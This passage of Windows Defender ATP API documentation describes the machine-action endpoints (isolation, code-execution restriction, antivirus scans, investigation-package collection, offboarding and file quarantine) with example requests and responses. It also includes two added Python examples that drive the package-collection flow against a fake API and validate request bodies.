"fileIdentifierType": "Sha1"
}
}
]
}

Example 2
Request
Here is an example of a request that filters the MachineActions by machine ID and shows the latest two
MachineActions.

GET https://api.securitycenter.windows.com/api/machineactions?$filter=machineId eq 'f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f'&$top=2

Response
Here is an example of the response.

HTTP/1.1 200 Ok
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions",
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
"type": "CollectInvestigationPackage",
"requestor": "Analyst@contoso.com",
"requestorComment": "test",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
"lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
"relatedFileInfo": null
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"requestor": "Analyst@contoso.com",
"requestorComment": "Check machine for viruses due to alert 3212",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
"relatedFileInfo": null
}
]
}

Related topics
OData queries with Windows Defender ATP
Get machineAction API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Gets an action performed on a machine.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine profiles'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)

HTTP request
GET https://api.securitycenter.windows.com/api/machineactions/{id}

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with a Machine Action entity. If no machine action entity with
the specified id was found, 404 Not Found.

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/machineactions/2e9da30d-27f6-4208-81f2-9cd3d67893ba

Response
Here is an example of the response.

HTTP/1.1 200 Ok
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"requestor": "Analyst@contoso.com",
"requestorComment": "Check machine for viruses due to alert 3212",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
"relatedFileInfo": null
}
Collect investigation package API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Collects an investigation package from a machine.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.CollectForensics 'Collect forensics'

Delegated (work or school account) Machine.CollectForensics 'Collect forensics'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Alerts Investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/collectInvestigationPackage

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/collectInvestigationPackage
Content-type: application/json
{
"Comment": "Collect forensics due to alert 1234"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "c9042f9b-8483-4526-87b5-35e4c2532223",
"type": "CollectInvestigationPackage",
"requestor": "Analyst@contoso.com",
"requestorComment": " Collect forensics due to alert 1234",
"status": "InProgress",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:09:24.1785079Z",
"lastUpdateTimeUtc": "2018-12-04T12:09:24.1785079Z",
"relatedFileInfo": null
}
Get package SAS URI API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Gets a URI that allows downloading of an investigation package.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.CollectForensics 'Collect forensics'

Delegated (work or school account) Machine.CollectForensics 'Collect forensics'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Alerts Investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)

HTTP request
GET https://api.securitycenter.windows.com/api/machineactions/{machine action id}/getPackageUri

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with an object that holds the link to the package in the
"value" parameter. This link is valid for a very short time and should be used immediately for downloading the
package to local storage.

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/machineactions/7327b54fd718525cbca07dacde913b5ac3c85673/GetPackageUri

Response
Here is an example of the response.

HTTP/1.1 200 Ok
Content-type: application/json

{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Edm.String",
"value": "\"https://userrequests-
us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.zip?
token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeB
sxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoA
vmh9%2fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydAsUW4g2oDZSPN3kCLBOoo1C4w4Lkc9
Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9FKJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNR
SnF1tVE5H3wXpREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8wJ16NDU96Pl6%2fgew2KYuk6
Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGkeK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3b
QOg41EJZkEZLyUEbk1hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr%2fHYQuaUWUBNVnXU
RYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2nPx6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh
4wc%2bXxGlBq7axDcoiOdX91rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxPt4Pe9YF2UPP
AJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YTF1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0
zbydSlT5SZwbSwescs0IpzECitBbaLUz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNsNlFz4
fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYFJ1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY
0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez49PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4Jes
TjZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYO
dT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDutHygn5IcA1y7GTZj4g%3d%3d\""
}
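The flow spelled out across the MachineAction, Collect investigation package and Get package SAS URI sections, written out as an added Python example (not code from the Microsoft documentation): start the collection, poll the action until its status is one of the terminal values from the status enum, then fetch the short-lived download link. It runs against a constructed in-memory stand-in for the API; the action id and machine id are taken from the page's examples and the token value is made up.

```python
"""Added example (not Microsoft's code): run the investigation-package flow
end to end against an in-memory stand-in for the ATP API."""
from dataclasses import dataclass
from typing import Callable, Optional, Tuple
from urllib.parse import urlsplit

# Status enum from the MachineAction resource type; only these four are final.
TERMINAL_STATUSES = {"Succeeded", "Failed", "TimeOut", "Cancelled"}
# A transport is any callable (method, path, json_body) -> (http_status, json).
Transport = Callable[[str, str, Optional[dict]], Tuple[int, dict]]


@dataclass
class MachineAction:
    id: str
    type: str
    status: str
    machine_id: str
    related_file_info: Optional[dict]

    @classmethod
    def from_json(cls, obj: dict) -> "MachineAction":
        # Keys follow the MachineAction properties table on this page.
        return cls(obj["id"], obj["type"], obj["status"], obj["machineId"],
                   obj.get("relatedFileInfo"))

    def is_final(self) -> bool:
        return self.status in TERMINAL_STATUSES


def collect_investigation_package(api: Transport, machine_id: str, comment: str) -> MachineAction:
    """POST /api/machines/{id}/collectInvestigationPackage; expects 201 Created."""
    path = f"/api/machines/{machine_id}/collectInvestigationPackage"
    code, body = api("POST", path, {"Comment": comment})
    if code != 201:
        raise RuntimeError(f"collectInvestigationPackage failed: HTTP {code}")
    return MachineAction.from_json(body)


def wait_for_action(api: Transport, action_id: str, max_polls: int = 30) -> MachineAction:
    """GET /api/machineactions/{id} until the status is terminal."""
    for _ in range(max_polls):
        code, body = api("GET", f"/api/machineactions/{action_id}", None)
        if code == 404:
            raise LookupError(f"machine action {action_id} not found")
        action = MachineAction.from_json(body)
        if action.is_final():
            return action
    raise TimeoutError(f"{action_id} not final after {max_polls} polls")


def get_package_uri(api: Transport, action_id: str) -> str:
    """GET .../getPackageUri; the documented 'value' wraps the link in extra quotes."""
    code, body = api("GET", f"/api/machineactions/{action_id}/getPackageUri", None)
    if code != 200:
        raise RuntimeError(f"getPackageUri failed: HTTP {code}")
    return body["value"].strip('"')


def redact_sas_uri(uri: str) -> str:
    """Log-safe form of the link: the SAS token is the query string, so drop it."""
    return urlsplit(uri)._replace(query="", fragment="").geturl()


def collect_and_fetch(api: Transport, machine_id: str, comment: str) -> Tuple[MachineAction, str]:
    # Whole flow: start collection, wait for it, then fetch the short-lived link.
    started = collect_investigation_package(api, machine_id, comment)
    done = wait_for_action(api, started.id)
    if done.status != "Succeeded":
        raise RuntimeError(f"collection ended as {done.status}")
    return done, get_package_uri(api, done.id)


class FakeAtpApi:
    """Constructed stand-in for api.securitycenter.windows.com. The ids are
    taken from the page's examples; the token value is made up."""
    ACTION_ID = "c9042f9b-8483-4526-87b5-35e4c2532223"
    MACHINE_ID = "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f"
    LINK = ("https://userrequests-us.securitycenter.windows.com:443/"
            "safedownload/WDATP_Investigation_Package.zip?token=CONSTRUCTED")

    def __init__(self, polls_until_done: int = 2) -> None:
        self.polls = 0
        self.polls_until_done = polls_until_done

    def _action(self, status: str) -> dict:
        return {"id": self.ACTION_ID, "type": "CollectInvestigationPackage",
                "requestor": "Analyst@contoso.com", "requestorComment": "test",
                "status": status, "machineId": self.MACHINE_ID, "relatedFileInfo": None}

    def __call__(self, method: str, path: str, body: Optional[dict]) -> Tuple[int, dict]:
        collect = f"/api/machines/{self.MACHINE_ID}/collectInvestigationPackage"
        action = f"/api/machineactions/{self.ACTION_ID}"
        if method == "POST" and path == collect:
            if not body or not body.get("Comment"):
                return 400, {}  # Comment is a required parameter
            return 201, self._action("InProgress")
        if method == "GET" and path == action:
            self.polls += 1
            return 200, self._action("Succeeded" if self.polls >= self.polls_until_done else "InProgress")
        if method == "GET" and path == action + "/getPackageUri":
            return 200, {"value": f'"{self.LINK}"'}  # quoted, as in the documented response
        return 404, {}
```

Only the redacted form of the link belongs in logs or tickets; the full value grants download access to anyone holding it until it expires.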
Isolate machine API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Isolates a machine from accessing the external network.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Isolate 'Isolate machine'

Delegated (work or school account) Machine.Isolate 'Isolate machine'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
for more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine
groups for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/isolate

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.
IsolationType | String | Type of the isolation. Allowed values are: 'Full' or 'Selective'.

IsolationType controls the type of isolation to perform and can be one of the following:
Full – Full isolation
Selective – Restrict only a limited set of applications from accessing the network (see Isolate machines from the
network for more details)

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/isolate
Content-type: application/json
{
"Comment": "Isolate machine due to alert 1234",
"IsolationType": "Full"
}

Response
Here is an example of the response.
HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "b89eb834-4578-496c-8be0-03f004061435",
"type": "Isolate",
"requestor": "Analyst@contoso.com ",
"requestorComment": "Isolate machine due to alert 1234",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2017-12-04T12:12:18.9725659Z",
"lastUpdateTimeUtc": "2017-12-04T12:12:18.9725659Z",
"relatedFileInfo": null
}

To unisolate a machine, see Release machine from isolation.


Release machine from isolation API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Undoes the isolation of a machine.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Isolate 'Isolate machine'

Delegated (work or school account) Machine.Isolate 'Isolate machine'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
for more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine
groups for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/unisolate

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unisolate
Content-type: application/json
{
"Comment": "Unisolate machine since it was clean and validated"
}

Response
Here is an example of the response.

NOTE
The response object shown here may be truncated for brevity. All of the properties will be returned from an actual call.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "09a0f91e-a2eb-409d-af33-5577fe9bd558",
"type": "Unisolate",
"requestor": "Analyst@contoso.com ",
"requestorComment": "Unisolate machine since it was clean and validated ",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2018-12-04T12:13:15.0104931Z",
"lastUpdateTimeUtc": "2018-12-04T12:13:15.0104931Z",
"relatedFileInfo": null
}
To isolate a machine, see Isolate machine.

Restrict app execution API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Restricts execution of all applications on the machine except a predefined set (see Response machine alerts for more
information).

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.RestrictExecution 'Restrict code execution'

Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
for more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/restrictCodeExecution

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.


Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/restrictCodeExecution
Content-type: application/json
{
"Comment": "Restrict code execution due to alert 1234"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "78d408d1-384c-4c19-8b57-ba39e378011a",
"type": "RestrictCodeExecution",
"requestor": "Analyst@contoso.com ",
"requestorComment": "Restrict code execution due to alert 1234",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2018-12-04T12:15:04.3825985Z",
"lastUpdateTimeUtc": "2018-12-04T12:15:04.3825985Z",
"relatedFileInfo": null
}

To remove the code execution restriction from a machine, see Remove app restriction.

Remove app restriction API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Enables execution of any application on the machine.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.RestrictExecution 'Restrict code execution'

Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
for more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine
groups for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/unrestrictCodeExecution

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unrestrictCodeExecution
Content-type: application/json
{
"Comment": "Unrestrict code execution since machine was cleaned and validated"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
"type": "UnrestrictCodeExecution",
"requestor": "Analyst@contoso.com",
"requestorComment": "Unrestrict code execution since machine was cleaned and validated ",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2018-12-04T12:15:40.6052029Z",
"lastUpdateTimeUtc": "2018-12-04T12:15:40.6052029Z",
"relatedFileInfo": null
}

To restrict code execution on a machine, see Restrict app execution.


Run antivirus scan API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Initiates a Windows Defender Antivirus scan on a machine.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Scan 'Scan machine'

Delegated (work or school account) Machine.Scan 'Scan machine'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
for more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/runAntiVirusScan

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.
ScanType | String | Defines the type of the scan. Required.

ScanType controls the type of scan to perform and can be one of the following:
Quick – Perform a quick scan on the machine
Full – Perform a full scan on the machine

Response
If successful, this method returns a 201 Created response code and a MachineAction object in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runAntiVirusScan
Content-type: application/json
{
"Comment": "Check machine for viruses due to alert 3212",
"ScanType": "Full"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"requestor": "Analyst@contoso.com",
"requestorComment": "Check machine for viruses due to alert 3212",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"lastUpdateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"relatedFileInfo": null
}
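An added Python example (not Microsoft's code) that builds and validates the request body for the machine-action endpoints documented in the sections above, together with the Sha1 parameter of the Stop and quarantine file API further down the page: Comment is always required, IsolationType and ScanType must take one of the documented values, and Sha1 must be a 40-character hex digest. The path suffixes and allowed values are taken from this page; the client-side validation is this example's own assumption, not behaviour the service documents.

```python
"""Added example (not Microsoft's code): build and validate the JSON body for
the machine-action endpoints before it is sent, so a bad IsolationType,
ScanType or Sha1 is caught client-side with a clear error."""
import re
from typing import Dict, Optional, Set, Tuple

# Path suffix under /api/machines/{id}/ for each MachineAction "type" value.
# (The page's Offboard example responds with type "OffboardMachine"; the enum
# in the MachineAction properties table calls it "Offboard", used here.)
ACTION_PATHS = {
    "Isolate": "isolate",
    "Unisolate": "unisolate",
    "RestrictCodeExecution": "restrictCodeExecution",
    "UnrestrictCodeExecution": "unrestrictCodeExecution",
    "RunAntiVirusScan": "runAntiVirusScan",
    "Offboard": "offboard",
    "CollectInvestigationPackage": "collectInvestigationPackage",
    "StopAndQuarantineFile": "StopAndQuarantineFile",
}
# The one extra required parameter some actions take, with its allowed values
# (None means the value is checked by SHA1_RE instead of a fixed set).
EXTRA_PARAMS: Dict[str, Tuple[str, Optional[Set[str]]]] = {
    "Isolate": ("IsolationType", {"Full", "Selective"}),
    "RunAntiVirusScan": ("ScanType", {"Quick", "Full"}),
    "StopAndQuarantineFile": ("Sha1", None),
}
SHA1_RE = re.compile(r"^[0-9a-f]{40}$", re.IGNORECASE)


def build_action_request(machine_id: str, action: str, comment: str,
                         **params: str) -> Tuple[str, Dict[str, str]]:
    """Return (request path, JSON body) for the action, or raise ValueError."""
    if action not in ACTION_PATHS:
        raise ValueError(f"unknown machine action {action!r}")
    if not machine_id.strip():
        raise ValueError("machine id is required")
    if not comment.strip():
        raise ValueError("Comment is required for every machine action")
    body: Dict[str, str] = {"Comment": comment}
    expected = EXTRA_PARAMS.get(action)
    if expected is None:
        if params:  # these endpoints document no parameter besides Comment
            raise ValueError(f"{action} takes no parameters besides Comment: {sorted(params)}")
        return f"/api/machines/{machine_id}/{ACTION_PATHS[action]}", body
    name, allowed = expected
    if set(params) != {name}:
        raise ValueError(f"{action} requires exactly the parameter {name!r}, got {sorted(params)}")
    value = params[name]
    if allowed is not None and value not in allowed:
        raise ValueError(f"{name} must be one of {sorted(allowed)}, got {value!r}")
    if allowed is None and not SHA1_RE.match(value):
        raise ValueError("Sha1 must be 40 hexadecimal characters")
    body[name] = value
    return f"/api/machines/{machine_id}/{ACTION_PATHS[action]}", body


if __name__ == "__main__":
    # Machine id and comment taken from the page's isolate example.
    path, body = build_action_request("1e5bc9d7e413ddd7902c2932e418702b84d0cc07", "Isolate",
                                      "Isolate machine due to alert 1234", IsolationType="Full")
    print("POST https://api.securitycenter.windows.com" + path, body)
```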
Offboard machine API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Offboards a machine from Windows Defender ATP.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Offboard 'Offboard machine'

Delegated (work or school account) Machine.Offboard 'Offboard machine'

NOTE
When obtaining a token using user credentials:
The user needs to have the 'Global Admin' AD role
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/offboard

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/offboard
Content-type: application/json
{
"Comment": "Offboard machine by automation"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "c9042f9b-8483-4526-87b5-35e4c2532223",
"type": "OffboardMachine",
"requestor": "Analyst@contoso.com",
"requestorComment": "offboard machine by automation",
"status": "InProgress",
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"creationDateTimeUtc": "2018-12-04T12:09:24.1785079Z",
"lastUpdateTimeUtc": "2018-12-04T12:09:24.1785079Z",
"relatedFileInfo": null
}
Stop and quarantine file API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Stops execution of a file on a machine and deletes it.

NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION                 PERMISSION DISPLAY NAME
Application                         Machine.StopAndQuarantine  'Stop And Quarantine'
Delegated (work or school account)  Machine.StopAndQuarantine  'Stop And Quarantine'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'Active remediation actions' (see Create and manage roles for more information).
- The user needs to have access to the machine, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/StopAndQuarantineFile

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER  TYPE    DESCRIPTION
Comment    String  Comment to associate with the action. Required.
Sha1       String  SHA-1 hash of the file to stop and quarantine on the machine. Required.

Response
If successful, this method returns a 201 Created response code and a Machine Action entity in the response body.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/StopAndQuarantineFile
Content-type: application/json
{
  "Comment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
  "Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
}

Response
Here is an example of the response.

HTTP/1.1 201 Created
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
  "id": "141408d1-384c-4c19-8b57-ba39e378011a",
  "type": "StopAndQuarantineFile",
  "requestor": "Analyst@contoso.com",
  "requestorComment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
  "status": "InProgress",
